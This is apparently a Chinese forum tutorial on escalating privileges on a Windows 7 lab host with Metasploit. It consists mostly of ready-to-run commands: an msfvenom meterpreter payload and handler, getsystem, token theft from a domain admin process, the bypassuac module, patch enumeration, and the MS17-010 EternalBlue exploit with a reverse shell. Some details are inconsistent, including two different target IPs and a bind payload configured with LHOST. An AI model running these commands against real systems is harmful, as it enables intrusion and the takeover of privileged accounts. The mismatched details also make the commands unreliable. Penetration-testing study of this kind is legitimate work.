Metasploit模块提权方法优化

图片[1]-Metasploit模块提权方法优化-山海云端论坛

1. 环境搭建

攻击主机:

  • Kali Linux 172.16.243.132

目标主机:

  • Windows 7 172.168.243.131

2. 上传Shell并连接

<code>msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=172.16.243.132 -f exe > shell.exe use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set LHOST 172.16.243.132 run</code>

成功建立正向Shell连接,通道已打开。

3. Meterpreter基础提权

3.1. 基础提权

在Meterpreter会话中,使用以下命令可实现自动提权:

getsystem

自动提权成功。

查看当前用户权限:

getuid

此时用户权限为SYSTEM。

3.2. 盗取用户进程令牌

通过Meterpreter会话执行ps命令查看当前进程:

ps

假设我们找到了一个域管理员运行的进程,其进程PID为2548:

steal_token 2548

成功盗取了域管理员的令牌,权限得到短暂提升。

3.3. 内置多个BypassUAC脚本

Metasploit内置多个BypassUAC脚本,使用方法类似,成功运行后会返回一个新的会话,需再次执行getsystem获取系统权限。

例如:

<code>use exploit/windows/local/bypassuac run</code>
3.4. 内核提权

连接Shell后,使用enum_patches模块收集补丁信息:

use post/windows/gather/enum_patches

根据具体的补丁信息选择相应的payload荷载进行利用。

4. 溢出漏洞模块提权

针对MS17-010漏洞进行攻击:

<code>use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOSTS 172.16.243.131 run</code>

成功利用MS17-010漏洞,建立连接。

可以使用migrate命令将当前会话迁移到SYSTEM权限进行的进程。

5. 总结

以上便是Meterpreter提权的基本方法和一些常用技巧。在渗透测试中,根据具体情况选择合适的提权方式非常重要,有时也需要结合多种方法来实现最终的目标。

© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容